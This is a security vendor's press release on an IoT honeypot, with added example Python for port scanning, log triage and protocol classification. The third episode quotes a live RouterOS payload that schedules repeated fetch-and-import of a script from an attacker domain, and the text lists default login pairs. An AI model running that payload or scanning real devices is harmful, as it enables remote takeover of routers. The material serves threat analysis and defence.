Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices
Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use IP/port scanning scripts to find open ports on a device; each open port belongs to a service listening on it, and that service is what the attacker then talks to.
Essentially, the attackers are launching an automated search for open doors and windows. The IP/port scanner itself can be very basic and simple to write at the entry level, or more complex depending on the attacker's skill or objectives.
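As an added illustration (not Avira's code), here is the kind of scanner the paragraph describes, in Python: a TCP connect probe over a list of ports, plus a banner grab that reads whatever the service announces first. The port-to-service table and the local lab listener are assumptions of this example; run it only against hosts you are permitted to probe.

```python
"""TCP connect scanner and banner grabber (added example, not Avira code).
Point it only at hosts you are permitted to probe; the lab listener below
lets you try it against 127.0.0.1."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Assumed port -> service map covering the services named in the article.
SERVICE_BY_PORT = {22: "ssh", 23: "telnet", 80: "http", 5555: "adb", 8291: "winbox"}


def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a TCP three-way handshake completes on host:port (the door is open)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan(host: str, ports, timeout: float = 1.0, workers: int = 32) -> dict:
    """Probe ports concurrently; return {port: service name} for the open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p, timeout)), ports))
    return {p: SERVICE_BY_PORT.get(p, "unknown") for p, is_open in results if is_open}


def grab_banner(host: str, port: int, timeout: float = 1.0, nbytes: int = 64) -> bytes:
    """Read what the service says first (e.g. b'SSH-2.0-...'); b'' if closed or silent."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            return s.recv(nbytes)
    except OSError:  # refused, timed out, reset
        return b""


def start_local_listener(banner: bytes = b"") -> tuple:
    """Lab helper: listen on a free 127.0.0.1 port, send `banner` to each client,
    then close it. Returns (server socket, port); close the socket to stop."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # server socket closed
                return
            with conn:
                try:
                    if banner:
                        conn.sendall(banner)
                except OSError:  # client hung up first (a plain port probe does)
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port() -> int:
    """Lab helper: a 127.0.0.1 port nothing is listening on right now."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_local_listener(b"SSH-2.0-lab_banner\r\n")
    print(scan("127.0.0.1", [port, free_port(), 22, 23, 5555]))
    print(grab_banner("127.0.0.1", port))
    srv.close()
```

The connect scan is the noisiest possible technique (every probe completes a handshake and shows up in the target's logs), which is exactly why honeypots see it within minutes; the banner grab is the step that turns "port 22 is open" into "this is an SSH server worth trying credentials against".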
It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had seen a range of attacks directed at Telnet, SSH and the Android Debug Bridge (ADB) service that Android devices expose.
Sharing is caring
These scanning scripts may appear to be from autonomous botnets, each individually probing for open ports or vulnerable services, but that is not always the case. Some attacking botnets are interconnected, sharing code and information about potential victims behind the scenes. This automated data exchange begins within minutes of a script spotting an open port and is followed by other botnets starting their assault. Shown below is a sequence of related attacks (source IP addresses are not reproduced; the Source column is the geolocation of the source address):
Attack no. | Date (UTC) | Port (service) | Source | Duration | Username | Password | Description |
---|---|---|---|---|---|---|---|
17357 | Wed, 18 Sep 2019 10:48:44 | 23 (Telnet) | Italy | 3.827 sec | root | zlxx. | Gathers information. Does not do anything malicious. |
17372 | Wed, 18 Sep 2019 10:48:49 | 23 (Telnet) | Singapore | 87.575 sec | root | zlxx. | The real attack. Downloads malware and infects the device. |
On Wed, 18 Sep 2019 at 10:48:44 (UTC) someone from Italy (more accurately, a script running on a host geolocated there) successfully logged into the honeypot with the username/password combination "root" / "zlxx.", looked around and left without dropping anything. That information was shared at once: five seconds later a different host, in Singapore, logged in with the same credentials and infected the device.
This data sharing and attack coordination shows that attackers have achieved a basic division of labor and established inter-bot communication. The first phase is to discover vulnerable devices and find a way in. The second phase is the actual infection and gaining persistence.
Blind shooting: brute-force attacks
Sharing data is still the exception. Often an entire attack is conducted in one session. This is essentially a shotgun attack in the dark: every reachable device is targeted, the exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples.
Episode one:
We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from a host in Ireland:
Attack no. | Date (UTC) | Port (service) | Source | Duration | Username | Password | Description |
---|---|---|---|---|---|---|---|
17501 | Wed, 18 Sep 2019 11:32:59 | 22 (SSH) | Ireland | 38.482 sec | Root | nosoup4u | Downloads malware and infects the device. |
If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue: nobody scouted first. Someone just logged in, infected the system and left. The only related session is the same attack, with the same credentials, almost twenty hours earlier:
Attack no. | Date (UTC) | Port (service) | Source | Duration | Username | Password | Description |
---|---|---|---|---|---|---|---|
7193 | Tue, 17 Sep 2019 15:47:29 | 22 (SSH) | | 38.117 sec | Root | nosoup4u | Downloads malware and infects the device. |
The attacker appears to have selected victims randomly or sequentially and attacked them without even changing the username/password combination. Analysis of the credentials shows that they are the default credentials for DreamPlug routers. So while every device receives the attack, only a DreamPlug still using its factory password is actually compromised.
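As an added example (not Avira's honeypot tooling), the following Python triage over honeypot login records reproduces both observations made so far: it detects the hand-off pattern of the Telnet table (the same credentials used successfully from different source countries within seconds, which the article reads as inter-bot sharing) and flags logins that use a vendor default such as the DreamPlug pair. The records are constructed from the four rows quoted in this article; the default-credential table holds only the pair the article names and is an assumption you would replace with your own list.

```python
"""Honeypot login-log triage (added example, not Avira's tooling).
Flags (1) credential hand-offs: the same username/password used successfully
from different source countries within a short window, and (2) logins that
match a vendor default."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Login:
    attack_id: int
    ts: str          # "YYYY-MM-DD HH:MM:SS", UTC
    country: str     # geolocation of the source address; "?" where not stated
    username: str
    password: str

    @property
    def when(self) -> datetime:
        return datetime.strptime(self.ts, "%Y-%m-%d %H:%M:%S")


# Constructed from the four rows quoted in the article (country of attack 7193
# is not given there).
LOGINS = [
    Login(17357, "2019-09-18 10:48:44", "Italy", "root", "zlxx."),
    Login(17372, "2019-09-18 10:48:49", "Singapore", "root", "zlxx."),
    Login(17501, "2019-09-18 11:32:59", "Ireland", "Root", "nosoup4u"),
    Login(7193, "2019-09-17 15:47:29", "?", "Root", "nosoup4u"),
]

# Vendor defaults keyed by (username lower-cased, password). Assumption: only
# the pair the article names; a real deployment would load a full list.
DEFAULT_CREDENTIALS = {("root", "nosoup4u"): "DreamPlug"}


def find_handoffs(logins, window_s: float = 60.0):
    """Return (earlier_id, later_id, seconds_between) for consecutive logins
    that share credentials, come from different countries and are at most
    window_s apart: one bot scouts, another one exploits."""
    by_cred = defaultdict(list)
    for login in logins:
        by_cred[(login.username.lower(), login.password)].append(login)
    hits = []
    for group in by_cred.values():
        group.sort(key=lambda l: l.when)
        for first, second in zip(group, group[1:]):
            delta = (second.when - first.when).total_seconds()
            if first.country != second.country and delta <= window_s:
                hits.append((first.attack_id, second.attack_id, delta))
    return hits


def match_defaults(logins, defaults=DEFAULT_CREDENTIALS):
    """Map attack_id -> vendor for every login that used a known default pair."""
    return {l.attack_id: defaults[(l.username.lower(), l.password)]
            for l in logins if (l.username.lower(), l.password) in defaults}


if __name__ == "__main__":
    print("hand-offs:", find_handoffs(LOGINS))
    print("default creds:", match_defaults(LOGINS))
```

On the article's data the hand-off detector reports exactly one pair (17357 followed by 17372, five seconds apart) and nothing for the two nosoup4u sessions, which are twenty hours apart; the default-credential match catches both DreamPlug logins, which is the signal that a lone brute-force script is walking a default-password list rather than coordinating with anyone.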
Episode two:
Attackers also mix ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB (Android Debug Bridge). The attack itself, however, did not comply with the ADB protocol, so the researchers dumped the raw bytes of the payload to find out what it actually was.
Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol), a type of attack the team usually sees originating from Russia. The payload had nothing to do with ADB. The attackers simply saw an open port and fired a blind RDP attack at it in the hope that an RDP server would be listening on the other end.
Episode three:
Similar to episode two, the honeypot caught another attack arriving on SSH, a service used almost everywhere: mainframes, servers, enterprise networks, routers, IP cameras and smartphones. The payload was the following script:
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
That is a MikroTik RouterOS script, and it only works on MikroTik devices; on any other manufacturer's hardware it has no effect. It adds a scheduler entry named U6 that every ten minutes fetches a .rsc file from the attacker's server and imports it, i.e. executes whatever commands the attacker has placed there, and it requests every policy the scheduler offers (including password, ssh, winbox and write). Again, a shotgun approach that can only work a fraction of the time.
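The protocol-versus-port mismatch in episodes two and three can be detected automatically. The following added Python example (not Avira's code) classifies the first bytes a client sends by public protocol signatures (RDP's TPKT/X.224 Connection Request, the ADB CNXN handshake with its inverted-command magic, the SSH version string, Telnet IAC negotiation, an HTTP request line, RouterOS script commands) and compares the result with what the honeypot port was meant to serve. The sample messages are constructed for the example, not captures from the honeypot, and the expected-service map is an assumption.

```python
"""Classify a connection by what the client actually sent, not by the port it
arrived on (added example, not Avira's tooling). Signatures are the public
ones for each protocol."""

ADB_COMMANDS = {b"CNXN", b"AUTH", b"OPEN", b"WRTE", b"OKAY", b"CLSE", b"SYNC", b"STLS"}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ")
ROUTEROS_MARKERS = (b"/system scheduler", b"/tool fetch", b"/import ")

# Assumed: what each honeypot port is meant to serve.
EXPECTED = {22: "ssh", 23: "telnet", 80: "http", 3389: "rdp", 5555: "adb"}


def looks_like_rdp(data: bytes) -> bool:
    """RDP opens with a TPKT header (version 3, reserved 0, 16-bit length)
    carrying an X.224 Connection Request TPDU: length indicator, then 0xE0."""
    if len(data) < 6 or data[0] != 3 or data[1] != 0:
        return False
    tpkt_len = int.from_bytes(data[2:4], "big")
    return tpkt_len >= 6 and (data[5] & 0xF0) == 0xE0


def looks_like_adb(data: bytes) -> bool:
    """ADB messages carry a 24-byte header: command, arg0, arg1, data length,
    data checksum, magic; magic must equal command XOR 0xFFFFFFFF."""
    if len(data) < 24 or data[:4] not in ADB_COMMANDS:
        return False
    command = int.from_bytes(data[0:4], "little")
    magic = int.from_bytes(data[20:24], "little")
    return magic == (command ^ 0xFFFFFFFF)


def classify(data: bytes) -> str:
    """Name the protocol the client spoke in its first bytes."""
    if looks_like_rdp(data):
        return "rdp"
    if looks_like_adb(data):
        return "adb"
    if data.startswith(b"SSH-"):
        return "ssh"
    if data.startswith(b"\xff"):          # Telnet IAC option negotiation
        return "telnet"
    if data.startswith(HTTP_METHODS):
        return "http"
    if any(marker in data for marker in ROUTEROS_MARKERS):
        return "routeros-script"
    return "unknown"


def triage(port: int, data: bytes, expected=EXPECTED) -> str:
    """Report whether the client spoke the protocol the port is meant to serve."""
    spoken, served = classify(data), expected.get(port, "unknown")
    if spoken == served:
        return "match"
    return f"mismatch: port {port} serves {served}, client spoke {spoken}"


def adb_message(command: bytes, arg0: int, arg1: int, payload: bytes) -> bytes:
    """Build a well-formed ADB message (used here only to construct a sample)."""
    magic = int.from_bytes(command, "little") ^ 0xFFFFFFFF
    header = (command + arg0.to_bytes(4, "little") + arg1.to_bytes(4, "little")
              + len(payload).to_bytes(4, "little")
              + (sum(payload) & 0xFFFFFFFF).to_bytes(4, "little")
              + magic.to_bytes(4, "little"))
    return header + payload


# Constructed samples, not honeypot captures.
RDP_CONNECT_REQUEST = (b"\x03\x00\x00\x13"                     # TPKT, length 19
                       + b"\x0e\xe0\x00\x00\x00\x00\x00"       # X.224 CR, LI = 14
                       + b"\x01\x00\x08\x00\x03\x00\x00\x00")  # RDP_NEG_REQ
ADB_CONNECT = adb_message(b"CNXN", 0x01000000, 256 * 1024, b"host::\x00")
ROUTEROS_PAYLOAD = (b'/system scheduler add name="U6" interval=10m '
                    b'on-event="/tool fetch url=http://1awesome.net/poll/... '
                    b'mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc"')

if __name__ == "__main__":
    print(triage(5555, RDP_CONNECT_REQUEST))   # episode two: RDP fired at the ADB port
    print(triage(22, ROUTEROS_PAYLOAD))        # episode three: RouterOS script at SSH
    print(triage(5555, ADB_CONNECT))           # a client that really speaks ADB
```

Checking the ADB magic field rather than only the four command letters matters: a scanner that happens to start its payload with "CNXN" would otherwise be misfiled, whereas the inverted-command magic at offset 20 is something only a real ADB client produces.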
Attackers are looking, sharing, and acting
Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot records almost ten attacks, an average of 14,125 attacks each day on just one device. An open port is an invitation that will not be refused.
Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices, and this raises the risk for every device that is exposed. Armed with information on open ports, attacks will happen, either as a more subtle coordinated approach or as a brute-force attack. This attack strategy is indirectly supported by device manufacturers that do not build security into product design, shipping blank or weak default passwords and poor device installation processes.
Block attackers at the doorway with Avira
The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.
This is why Avira has developed SafeThings™ -- comprehensive protection for all internet connected devices in the home. For more information on Avira insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.